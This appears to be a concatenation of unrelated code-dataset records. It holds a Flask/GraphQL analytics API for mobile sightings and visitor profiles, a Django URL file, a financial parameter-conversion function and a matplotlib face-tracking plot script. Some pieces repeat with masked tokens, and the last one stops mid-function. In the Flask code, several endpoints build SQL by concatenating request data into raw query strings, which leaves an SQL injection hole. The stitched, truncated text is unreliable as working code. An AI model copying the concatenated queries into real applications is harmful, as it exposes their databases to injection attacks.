make_response(jsonify(thing)), 200\n\n @app.route('/api/origindestination/<origin_id>', methods=['GET'])\n def get_od(origin_id):\n journeys = Journey.query.all()\n _j = []\n for journey in journeys:\n _j.append({'origin_id': journey.origin_id, 'destination_id':\n journey.destination_id, 'total': journey.data['total']})\n return make_response(jsonify({'list': _j})), 200\n\n @app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>',\n methods=['GET'])\n def purchase(home_district_name, type_visitor):\n days_sql = db.session.query(PurchDistrict.start_dow, func.count(\n PurchDistrict.start_dow)).group_by(PurchDistrict.start_dow).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).order_by(func.\n count(PurchDistrict.start_dow).desc()).all()\n gender_sql = db.session.query(PurchDistrict.gender, 
func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, func.count(PurchDistrict.gender)).group_by(\n PurchDistrict.gender, PurchDistrict.age).filter(PurchDistrict.\n gender.isnot(None)).filter(PurchDistrict.age.isnot(None)).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n days_total = sum(i[1] for i in days_sql)\n gender_total = sum(i[1] for i in gender_sql)\n gender_age_total = sum(i[2] for i in gender_age_sql)\n days_results = []\n for result in days_sql:\n days_results.append({'start_dow': result.start_dow, 'count':\n result[1], 'percent': float(result[1]) / float(days_total),\n 'total': days_total})\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_results = []\n for result in gender_age_sql:\n gender_age_results.append({'gender': result.gender, 'age':\n result.age, 'count': result[2], 'percent': float(result[2]) /\n float(gender_age_total)})\n return make_response(jsonify({'days': days_results, 'gender':\n gender_results, 'gender_age': gender_age_results})), 200\n\n @app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=[\n 'GET'])\n def purchase_rent(type_visitor):\n gender_sql = db.session.query(PurchDistrict.gender, func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n gender_total = sum(i[1] for i in gender_sql)\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_rent_results = []\n for result in gender_age_rent_sql:\n gender_age_rent_results.append({'gender': result.gender, 'age':\n result.age, 'rent': result.rent, 'count': result[3]})\n return make_response(jsonify({'gender': gender_results,\n 'gender_age_rent': gender_age_rent_results})), 200\n\n @app.route('/api/ng_event/districts', methods=['GET'])\n def districts():\n home_results = []\n for result in db.session.query(ZoneDistrict.home_district_code,\n ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.home_district_code, ZoneDistrict.\n home_district_name).all():\n home_results.append({'district_code': result.home_district_code,\n 'district_name': result.home_district_name, 'visitors':\n result[2]})\n work_results = []\n for result in db.session.query(ZoneDistrict.work_district_code,\n 
ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.work_district_code, ZoneDistrict.\n work_district_name).all():\n work_results.append({'district_code': result.work_district_code,\n 'district_name': result.work_district_name, 'visitors':\n result[2]})\n return make_response(jsonify({'work': {'list': work_results},\n 'home': {'list': home_results}})), 200\n\n @app.route('/api/ng_event/attractiontotals', methods=['GET'])\n def attractiontotals():\n results = []\n for result in db.session.query(AttractionTotal.zone_visitors,\n AttractionTotal.num_visitors).all():\n results.append({'zone_visitors': result.zone_visitors,\n 'num_visitors': result.num_visitors})\n return make_response(jsonify({'totals': {'list': results}})), 200\n\n @app.route('/api/ng_event/profiles', methods=['GET'])\n def profiles():\n results = []\n for result in db.session.query(Profile.country, Profile.nationality,\n Profile.name_province, Profile.gender, Profile.age, Profile.\n rent, Profile.type_visitor, Profile.date, Profile.day, Profile.\n period, Profile.name_tur_zone).limit(10000):\n district = ''\n if result.name_tur_zone == 'Zone 1':\n district = 'Chamartin'\n if result.name_tur_zone == 'Zone 2':\n district = 'Chamberi'\n if result.name_tur_zone == 'Zone 3':\n district = 'Salamanca'\n day = ''\n if result.day == 'Monday':\n day = 'Mon'\n if result.day == 'Tuesday':\n day = 'Tue'\n if result.day == 'Wednesday':\n day = 'Wed'\n if result.day == 'Thursday':\n day = 'Thu'\n if result.day == 'Friday':\n day = 'Fri'\n if result.day == 'Saturday':\n day = 'Sat'\n if result.day == 'Sunday':\n day = 'Sun'\n results.append({'country': result.country, 'nationality':\n result.nationality, 'name_province': district, 'gender':\n result.gender, 'age': result.age, 'rent': result.rent,\n 'type_visitor': result.type_visitor, 'date': result.date,\n 'day': day, 'period': result.period, 'zone': result.\n name_tur_zone})\n return make_response(jsonify(results)), 200\n\n @app.route('/api/ng_event/dowfreq', methods=['GET'])\n def dowfreq():\n results = []\n for result in db.session.query(DOWFrequency.type_visitor,\n DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count\n ).all():\n results.append({'type_visitor': result.type_visitor,\n 'start_dow': result.start_dow, 'start_hour': result.\n start_hour, 'count': result.count})\n return make_response(jsonify(results)), 200\n return app\n",
"step-5": "# app/__init__.py\nimport json\nfrom flask_api import FlaskAPI, status\nimport graphene\nfrom graphene import relay\nfrom graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func\nfrom flask import request, jsonify, abort, make_response\n\nfrom flask_graphql import GraphQLView\n\nfrom shapely.geometry import shape, Point\n\n# local import\n\nfrom instance.config import app_config\n\n# For password hashing\nfrom flask_bcrypt import Bcrypt\n\n# initialize db\ndb = SQLAlchemy()\n\nfrom app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey\nfrom app.models import Department as DepartmentModel\nfrom app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency\n\nclass Department(SQLAlchemyObjectType):\n\n class Meta:\n model = DepartmentModel\n interfaces = (relay.Node, )\n\nclass Query(graphene.ObjectType):\n node = relay.Node.Field()\n all_employees = SQLAlchemyConnectionField(Department)\n\ndef create_app(config_name):\n\n app = FlaskAPI(__name__, instance_relative_config=True)\n # overriding Werkzeugs built-in password hashing utilities using Bcrypt.\n bcrypt = Bcrypt(app)\n\n schema = graphene.Schema(query=Query)\n\n app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))\n\n app.config.from_object(app_config[config_name])\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n @app.route('/api/areas/create', methods=['POST'])\n def create_areas():\n # get the access token\n\n name = request.data.get('name', '')\n geodata = request.data.get('geodata', '')\n center_lat = request.data.get('center_lat')\n center_lng = request.data.get('center_lng')\n zoom = request.data.get('zoom')\n\n area = Area(name=name, geodata=geodata, center_lat=center_lat, center_lng=center_lng, zoom=zoom)\n area.save()\n response = jsonify({\n 'id': area.id,\n 'name': area.name,\n 'geodata': area.geodata,\n 'center_lat' : area.center_lat,\n 'center_lng' : area.center_lng,\n 'zoom' : area.zoom,\n 'date_created': area.date_created,\n 'date_modified': area.date_modified\n })\n\n return make_response(response), 201\n\n @app.route('/api/areas/delete', methods=['POST'])\n def delete_areas():\n # get the access token\n id = request.data.get('id', 0)\n area = Area.query.filter_by(id=id).first()\n\n if (area is not None):\n area.delete()\n\n return make_response(jsonify({'id':id})), 200\n\n\n @app.route('/api/sightingsperhour', methods=['GET'])\n def get_sightingsperhour():\n # get all the areas\n sightings = SightingsPerHourPerCountry.query.all()\n results = []\n for sighting in sightings:\n results.append({'country' : sighting.country, 'hour' : sighting.hour, 'count' : sighting.count})\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/sightingsnew', methods=['POST'])\n def sightingsnew():\n\n sightings = db.session.query(SightingsBase.site_id, SightingsBase.country, func.count(SightingsBase.roundedtoday))\\\n .filter(SightingsBase.site_id.in_(request.data['selectedRow']))\\\n .filter(SightingsBase.roundedtoday.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\\\n .group_by(SightingsBase.site_id, SightingsBase.country)\\\n .order_by(SightingsBase.site_id, func.count(SightingsBase.roundedtoday).desc())\\\n\n results = []\n for sighting in sightings.all():\n results.append({'country' : 
sighting.country, 'site_id' : sighting.site_id, 'count' : sighting[2]})\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n @app.route('/api/widesightingsnew', methods=['POST', 'GET'])\n def widesightingsnew():\n\n sightings = db.session.query(WideSighting.site_id, WideSighting.gender, func.count(WideSighting.gender))\\\n .filter(WideSighting.site_id.in_([138, 134]))\\\n .group_by(WideSighting.site_id, WideSighting.gender)\n\n results = []\n for sighting in sightings.all():\n #gender = sighting.gender if len(sighting.gender) else 'unknown'\n results.append({'site_id' : sighting.site_id, 'gender' : sighting.gender, 'count' : sighting[2]})\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n @app.route('/api/widesightings', methods=['GET'])\n def widesightings():\n\n sightings = WideSighting.get_all()\n\n results = []\n for sighting in sightings:\n results.append(sighting.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/sites', methods=['GET'])\n def get_sites():\n # get all the areas\n sites = Site.get_all()\n results = []\n for site in sites:\n results.append(site.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/dates', methods=['GET'])\n def get_dates():\n # get all the areas\n dates = Date.get_all()\n results = []\n for date in dates:\n results.append(date.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/areas', methods=['GET'])\n def get_areas():\n # get all the areas\n areas = Area.get_all()\n allSmallCells = SmallCell.get_all()\n\n results = []\n\n for area in areas:\n\n smallcellInArea = []\n for smallcell in allSmallCells:\n smallcellInArea.append(smallcell.serialise())\n\n obj = {\n 'id': area.id,\n 'name': area.name,\n 'date_created': area.date_created,\n 'date_modified': area.date_modified,\n 'center_lat' : area.center_lat,\n 'center_lng' : area.center_lng,\n 'zoom' : area.zoom,\n 'geodata': area.geodata,\n 'smallcells' : smallcellInArea\n }\n results.append(obj)\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/smallcells', methods=['GET'])\n def get_smallcells():\n allSmallCells = SmallCell.query.order_by(SmallCell.id).all()\n\n results = []\n for smallcell in allSmallCells:\n results.append(smallcell.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/smallcells/update', methods=['POST'])\n def update_smallcell():\n smallcell_id = request.data.get('id', '')\n site_id = request.data.get('site_id', '')\n\n smallcell = SmallCell.query.filter_by(id=smallcell_id).first()\n smallcell.site_id = site_id\n smallcell.save()\n\n return make_response(jsonify({ 'smallcell_id' : smallcell.id, 'site_id' : smallcell.site_id })), 200\n\n @app.route('/api/sighting/byarea/<areaid>', methods=['GET'])\n def get_sighting(areaid):\n import string\n area = Area.query.filter_by(id=areaid).first()\n if area is None : return make_response(jsonify({ 'list' : [] })), 200\n\n sites = []\n for site in Site.get_all():\n if area.contains(site):\n sites.append(str(site.id))\n\n def generate_random_data(num_rows):\n import random\n latitude = 51.51451110408478\n longitude = -0.12620388576521444\n result = []\n for _ in range(num_rows):\n dec_lat = random.random()/10\n dec_lon = random.random()/10\n result.append({'lat' : latitude + dec_lat, 'lng' : longitude + dec_lon})\n return result\n\n results = []\n if (len(sites) > 0):\n for row in db.session.execute('select * from 
get_gender_crossfilter(ARRAY[' + ','.join(sites) + '])'):\n\n results.append(({ 'geos': generate_random_data(5), 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'timestamp' : row['__sighting_date'], 'count' : row['__count'] }))\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n\n @app.route('/api/sighting/getgender/', methods=['POST'])\n def get_gender():\n\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n\n import string\n\n results = []\n\n for row in db.session.execute(\"select * from get_gender(ARRAY[\" + site_ids + \"],\" + \"'\" + from_sighting_date + \"'\" + \",\" + \"'\" + to_sighting_date + \"'\" + \")\"):\n results.append(({ 'site_id' : row['__site_id'], 'date_month' : row['__date_month'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'perc_visits' : row['__perc_visits'], 'scaled_visits' : row['__scaled_visits'] }))\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n @app.route('/api/sighting/getgendertotals/', methods=['POST'])\n def get_gender_age_totals():\n\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n\n import string\n\n results = []\n\n for row in db.session.execute(\"select * from get_gender_age_totals(ARRAY[\" + site_ids + \"],\" + \"'\" + from_sighting_date + \"'\" + \",\" + \"'\" + to_sighting_date + \"'\" + \")\"):\n results.append(({ 'site_id' : row['__site_id'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], '__visits' : row['__visits'] }))\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n\n @app.route('/api/sighting', methods=['GET'])\n def get_sightings():\n\n results = []\n for sighting in LTESighting.get_all():\n results.append(sighting.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/sitescomparison', methods=['POST'])\n def get_sitescomparison():\n\n sightings = LTESighting.query\\\n .filter(LTESighting.smallcell.has(SmallCell.site_id.in_(request.data['selectedRow'])))\\\n .filter(LTESighting.timestamp.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\n\n return make_response(jsonify({ 'list' : [sighting.serialise() for sighting in sightings] })), 200\n\n @app.route('/api/sighting/bysite', methods=['GET'])\n def get_sightings_by_site():\n\n site_ids = (request.args.getlist('site_id'))\n\n results = []\n #should do this better with joins!\n for sighting in LTESighting.query:\n if (str(sighting.smallcell.site_id)) in site_ids : results.append(sighting.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/origindestination/all', methods=['GET'])\n def get_all():\n journeys = Journey.query.all()\n thing = {}\n for journey in journeys:\n if (journey.origin_id not in thing) :\n thing[journey.origin_id] = {}\n if (journey.destination_id not in thing[journey.origin_id] and journey.destination_id != journey.origin_id) :\n thing[journey.origin_id][journey.destination_id] = journey.data['total']\n\n return make_response(jsonify(thing)), 200\n\n @app.route('/api/origindestination/<origin_id>', methods=['GET'])\n def get_od(origin_id):\n journeys = Journey.query.all()#.filter_by(origin_id=origin_id).all()\n _j = []\n for journey in journeys:\n _j.append({'origin_id' : journey.origin_id, 'destination_id' : journey.destination_id, 
'total' : journey.data['total']})\n #_j.append({'origin_id' : journey.origin_id, 'data' : (journey.data)})\n\n return make_response(jsonify({ 'list' : _j })), 200\n\n @app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>', methods=['GET'])\n def purchase(home_district_name, type_visitor):\n\n days_sql = db.session.query(PurchDistrict.start_dow, func.count(PurchDistrict.start_dow))\\\n .group_by(PurchDistrict.start_dow)\\\n .filter(PurchDistrict.home_district_name.in_([home_district_name]))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor]))\\\n .order_by(func.count(PurchDistrict.start_dow).desc())\\\n .all()\n\n gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender)\\\n .filter(PurchDistrict.home_district_name.in_([home_district_name]))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n gender_age_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender, PurchDistrict.age)\\\n .filter(PurchDistrict.gender.isnot(None))\\\n .filter(PurchDistrict.age.isnot(None))\\\n .filter(PurchDistrict.home_district_name.in_([home_district_name]))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n\n gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\\\n .filter(PurchDistrict.gender.isnot(None))\\\n .filter(PurchDistrict.age.isnot(None))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n days_total = sum(i[1] for i in days_sql)\n gender_total = sum(i[1] for i in gender_sql)\n gender_age_total = sum(i[2] for i in gender_age_sql)\n\n days_results = []\n for result in days_sql:\n days_results.append({ 'start_dow' : result.start_dow, 'count' : result[1], 'percent' : float(result[1])/float(days_total), 'total' : days_total})\n\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})\n\n gender_age_results = []\n for result in gender_age_sql:\n gender_age_results.append({'gender' : result.gender, 'age' : result.age, 'count' : result[2], 'percent' : float(result[2])/float(gender_age_total)})\n\n return make_response(jsonify({'days' : days_results, 'gender' : gender_results, 'gender_age' : gender_age_results})), 200\n\n\n @app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=['GET'])\n def purchase_rent(type_visitor):\n\n gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender)\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\\\n .filter(PurchDistrict.gender.isnot(None))\\\n .filter(PurchDistrict.age.isnot(None))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n gender_total = sum(i[1] for i in gender_sql)\n\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})\n\n gender_age_rent_results = []\n for result in gender_age_rent_sql:\n gender_age_rent_results.append({'gender' : 
result.gender, 'age' : result.age, 'rent' : result.rent, 'count' : result[3]})\n\n return make_response(jsonify({'gender' : gender_results, 'gender_age_rent' : gender_age_rent_results})), 200\n\n\n @app.route('/api/ng_event/districts', methods=['GET'])\n def districts():\n\n home_results = []\n for result in db.session.query(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name).all():\n home_results.append({'district_code' : result.home_district_code, 'district_name' : result.home_district_name, 'visitors' : result[2]})\n\n work_results = []\n for result in db.session.query(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name).all():\n work_results.append({'district_code' : result.work_district_code, 'district_name' : result.work_district_name, 'visitors' : result[2]})\n\n return make_response(jsonify({'work' : { 'list' : work_results }, 'home' : { 'list' : home_results }})), 200\n\n\n @app.route('/api/ng_event/attractiontotals', methods=['GET'])\n def attractiontotals():\n\n results = []\n for result in db.session.query(AttractionTotal.zone_visitors, AttractionTotal.num_visitors).all():\n results.append({'zone_visitors' : result.zone_visitors, 'num_visitors' : result.num_visitors})\n\n return make_response(jsonify({'totals' : { 'list' : results }})), 200\n\n\n @app.route('/api/ng_event/profiles', methods=['GET'])\n def profiles():\n\n results = []\n for result in db.session.query(Profile.country, Profile.nationality, Profile.name_province, Profile.gender, Profile.age, Profile.rent, Profile.type_visitor, Profile.date, Profile.day, Profile.period, Profile.name_tur_zone).limit(10000):\n district = ''\n if result.name_tur_zone == 'Zone 1' : district = 'Chamartin'\n if result.name_tur_zone == 'Zone 2' : district = 'Chamberi'\n if result.name_tur_zone == 'Zone 3' : district = 'Salamanca'\n\n day = ''\n if result.day == 'Monday' : day = 'Mon'\n if result.day == 'Tuesday' : day = 'Tue'\n if result.day == 'Wednesday' : day = 'Wed'\n if result.day == 'Thursday' : day = 'Thu'\n if result.day == 'Friday' : day = 'Fri'\n if result.day == 'Saturday' : day = 'Sat'\n if result.day == 'Sunday' : day = 'Sun'\n\n results.append({'country' : result.country, 'nationality' : result.nationality, 'name_province' : district, 'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'type_visitor' : result.type_visitor, 'date' : result.date, 'day' : day, 'period' : result.period, 'zone' : result.name_tur_zone })\n\n return make_response(jsonify(results)), 200\n\n @app.route('/api/ng_event/dowfreq', methods=['GET'])\n def dowfreq():\n\n results = []\n for result in db.session.query(DOWFrequency.type_visitor, DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count).all():\n results.append({'type_visitor' : result.type_visitor, 'start_dow' : result.start_dow, 'start_hour' : result.start_hour, 'count' : result.count })\n\n return make_response(jsonify(results)), 200\n\n return app\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.urls import path,include
from Income import views
urlpatterns = [
path('IncomeHome/',views.IncomeHome,name='IncomeHome'),
path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),
path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),
path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),
path('Income/',views.IncomeView.as_view(),name='Income'),
]
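
# --- Hedged illustration (not part of the original record) ---
# The routes above assume class-based views defined in Income/views.py. A
# minimal sketch of what IncomeCreate might look like; the Income model, its
# field names, and the redirect target are assumptions for illustration only,
# and this snippet belongs in views.py rather than urls.py.
from django.views.generic.edit import CreateView
from django.urls import reverse_lazy
from Income.models import Income  # hypothetical model

class IncomeCreate(CreateView):
    model = Income
    fields = ['amount', 'source', 'date']  # hypothetical field names
    success_url = reverse_lazy('Income')   # redirect to the list view routed above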
|
normal
|
{
"blob_id": "ad3a7221883a847fc9d26097c3801973cbbda38e",
"index": 355,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-3": "from django.urls import path, include\nfrom Income import views\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-4": "\nfrom django.urls import path,include\n\nfrom Income import views\n\nurlpatterns = [\n path('IncomeHome/',views.IncomeHome,name='IncomeHome'),\n path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),\n path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),\n path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),\n path('Income/',views.IncomeView.as_view(),name='Income'),\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from numpy import sqrt
def Schout2ConTank(a, b, d):
    """Convert parameters from Schoutens notation to Cont-Tankov notation."""
th = d * b / sqrt(a ** 2 - b ** 2)
k = 1 / (d * sqrt(a ** 2 - b ** 2))
s = sqrt(d / sqrt(a ** 2 - b ** 2))
return th, k, s
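
# Hedged usage sketch (parameter values are illustrative, not from the
# original record); requires a > |b| and d > 0 so the square roots are real.
# The returned triple is the Cont-Tankov parametrisation (often written
# theta, kappa, sigma).
if __name__ == '__main__':
    theta, kappa, sigma = Schout2ConTank(2.0, 1.0, 0.5)
    print(theta, kappa, sigma)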
|
normal
|
{
"blob_id": "4dda122a8c3a2aab62bb202945f6fb9cb73cf772",
"index": 8330,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Schout2ConTank(a, b, d):\n th = d * b / sqrt(a ** 2 - b ** 2)\n k = 1 / (d * sqrt(a ** 2 - b ** 2))\n s = sqrt(d / sqrt(a ** 2 - b ** 2))\n return th, k, s\n",
"step-3": "from numpy import sqrt\n\n\ndef Schout2ConTank(a, b, d):\n th = d * b / sqrt(a ** 2 - b ** 2)\n k = 1 / (d * sqrt(a ** 2 - b ** 2))\n s = sqrt(d / sqrt(a ** 2 - b ** 2))\n return th, k, s\n",
"step-4": "from numpy import sqrt\n\n\ndef Schout2ConTank(a, b, d):\n # This function converts parameters from Schoutens notation to Cont-Tankov\n # notation\n\n ## Code\n th = d * b / sqrt(a ** 2 - b ** 2)\n k = 1 / (d * sqrt(a ** 2 - b ** 2))\n s = sqrt(d / sqrt(a ** 2 - b ** 2))\n return th, k, s\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals, 0]
y = data.iloc[x_vals, 1]
if counter > 10:
x_vals.pop(0)
plt.cla()
axes = plt.gca()
axes.set_ylim([0, 30])
counter = counter + 1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width / 2
screen_y1 = height / 2
X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = X * X
d_y = Y * Y
D = d_x + d_y
distance = math.sqrt(D)
plt.scatter(counter, distance, s=50, linewidth=1)
plt.xlabel('Time')
plt.ylabel('Movement of student from the center of screen')
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
<|reserved_special_token_0|>
plt.savefig('Scatter_Graph.png')
plt.tight_layout()
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
x_vals = []
root = Tk()
counter = 0
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals, 0]
y = data.iloc[x_vals, 1]
if counter > 10:
x_vals.pop(0)
plt.cla()
axes = plt.gca()
axes.set_ylim([0, 30])
counter = counter + 1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width / 2
screen_y1 = height / 2
X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = X * X
d_y = Y * Y
D = d_x + d_y
distance = math.sqrt(D)
plt.scatter(counter, distance, s=50, linewidth=1)
plt.xlabel('Time')
plt.ylabel('Movement of student from the center of screen')
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
ani = FuncAnimation(plt.gcf(), animate, interval=1000)
plt.savefig('Scatter_Graph.png')
plt.tight_layout()
plt.show()
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import math
from tkinter import *
from tkinter.ttk import *
from facedetectandtrack import *
x_vals = []
root = Tk()
counter = 0
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals, 0]
y = data.iloc[x_vals, 1]
if counter > 10:
x_vals.pop(0)
plt.cla()
axes = plt.gca()
axes.set_ylim([0, 30])
counter = counter + 1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width / 2
screen_y1 = height / 2
X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = X * X
d_y = Y * Y
D = d_x + d_y
distance = math.sqrt(D)
plt.scatter(counter, distance, s=50, linewidth=1)
plt.xlabel('Time')
plt.ylabel('Movement of student from the center of screen')
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
ani = FuncAnimation(plt.gcf(), animate, interval=1000)
plt.savefig('Scatter_Graph.png')
plt.tight_layout()
plt.show()
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import math
from tkinter import *
from tkinter.ttk import *
from facedetectandtrack import *
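# Note: face_x2 and face_y2 (the tracked face-center coordinates used in
# animate() below) are expected to come from this star import;
# facedetectandtrack is a module local to the original project and is not
# shown in this record.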
x_vals = []
root = Tk()
counter=0
#def graph():
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals,0]
y = data.iloc[x_vals,1]
if counter>10:
x_vals.pop(0)
plt.cla()
axes=plt.gca()
axes.set_ylim([0,30])
#plt.plot(x, y)
counter=counter+1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width/2
screen_y1 = height/2
